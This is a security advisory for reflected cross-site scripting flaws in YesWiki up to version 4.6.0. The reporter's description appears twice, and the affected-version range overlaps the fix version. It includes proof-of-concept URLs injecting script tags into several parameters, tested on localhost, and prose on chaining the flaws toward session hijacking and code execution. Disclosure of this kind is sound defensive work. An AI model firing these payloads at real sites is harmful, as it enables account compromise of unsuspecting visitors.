Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.3
YesWiki: Malicious JavaScript can be injected via URLs
GHSA-5724-x3rh-5qqq
Summary
YesWiki has a security flaw that allows malicious code to be injected into a user's browser when they visit a specially crafted URL. This could lead to unauthorized access to sensitive information or other security risks. To fix this, update YesWiki to the latest version or use a secure proxy to filter out malicious URLs.
What to do
- Update yeswiki yeswiki to version 4.6.0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| yeswiki | yeswiki | <= 4.6.0 | 4.6.0 |
Original title
YesWiki has Multiple Reflected Cross-site Scripting Vulnerabilities
Original description
### Summary
Multiple **reflected Cross-site Scripting (XSS)** vulnerabilities across both **authenticated and unauthenticated** portions of the application. These findings present a significant security risk, as they can be leveraged to execute arbitrary JavaScript in a victim’s browser under various contexts.
## Impact and Exploitation
While XSS is often treated as a standalone issue, these vulnerabilities have broader implications. Specifically, they can be used as **launch points to exploit other significant vulnerabilities**.
Proof of concept links follow. All testing was performed on my local docker setup running the lastest version of the application.
## Proof of Concepts
## Authenticated Reflected XSS
```
http://localhost:8085/?ElizabethJFeinler/deletepage&incomingurl=%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```
```
http://localhost:8085/?BazaR&vue=saisir&action=saisir_fiche&id=%3Cscript%3Ealert(1)%3C%2fscript%3E
```
```
http://localhost:8085/?GererThemes/upload&file=%3Cscript%3Ealert(1)%3C/script%3E
```
## Unauthenticated Reflected XSS
```
http://localhost:8085/?PagePrincipale/listpages&tags=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
```
In this one, most of the parameters can be used to deliver an XSS payload, not just the template parameter.
```
http://localhost:8085/?BazaR/bazariframe&id=2&template=<script>alert(1)</script>&width=100%25&height=600px&lat=46.22763&lon=2.213749&markersize=big&provider=MapBox&zoom=5&groups=&titles=&groupsexpanded=false
```
### Impact
The reflected XSS vulnerabilities identified pose a significant risk to both application integrity and user safety. When combined with other issues discovered such as insecure endpoints or improper authentication mechanisms. These XSS flaws can be leveraged to escalate access, hijack sessions, and in some cases, achieve remote code execution (RCE). For example, malicious JavaScript executed via XSS could be used to trigger authenticated requests that exploit backend vulnerabilities, ultimately allowing an attacker to execute arbitrary commands on the server or pivot deeper into the environment.
### Mitigation
Update to version 4.6.0
Multiple **reflected Cross-site Scripting (XSS)** vulnerabilities across both **authenticated and unauthenticated** portions of the application. These findings present a significant security risk, as they can be leveraged to execute arbitrary JavaScript in a victim’s browser under various contexts.
## Impact and Exploitation
While XSS is often treated as a standalone issue, these vulnerabilities have broader implications. Specifically, they can be used as **launch points to exploit other significant vulnerabilities**.
Proof of concept links follow. All testing was performed on my local docker setup running the lastest version of the application.
## Proof of Concepts
## Authenticated Reflected XSS
```
http://localhost:8085/?ElizabethJFeinler/deletepage&incomingurl=%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```
```
http://localhost:8085/?BazaR&vue=saisir&action=saisir_fiche&id=%3Cscript%3Ealert(1)%3C%2fscript%3E
```
```
http://localhost:8085/?GererThemes/upload&file=%3Cscript%3Ealert(1)%3C/script%3E
```
## Unauthenticated Reflected XSS
```
http://localhost:8085/?PagePrincipale/listpages&tags=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
```
In this one, most of the parameters can be used to deliver an XSS payload, not just the template parameter.
```
http://localhost:8085/?BazaR/bazariframe&id=2&template=<script>alert(1)</script>&width=100%25&height=600px&lat=46.22763&lon=2.213749&markersize=big&provider=MapBox&zoom=5&groups=&titles=&groupsexpanded=false
```
### Impact
The reflected XSS vulnerabilities identified pose a significant risk to both application integrity and user safety. When combined with other issues discovered such as insecure endpoints or improper authentication mechanisms. These XSS flaws can be leveraged to escalate access, hijack sessions, and in some cases, achieve remote code execution (RCE). For example, malicious JavaScript executed via XSS could be used to trigger authenticated requests that exploit backend vulnerabilities, ultimately allowing an attacker to execute arbitrary commands on the server or pivot deeper into the environment.
### Mitigation
Update to version 4.6.0
ghsa CVSS4.0
5.3
Vulnerability type
CWE-79
Cross-site Scripting (XSS)
Published: 1 Apr 2026 · Updated: 1 Apr 2026 · First seen: 1 Apr 2026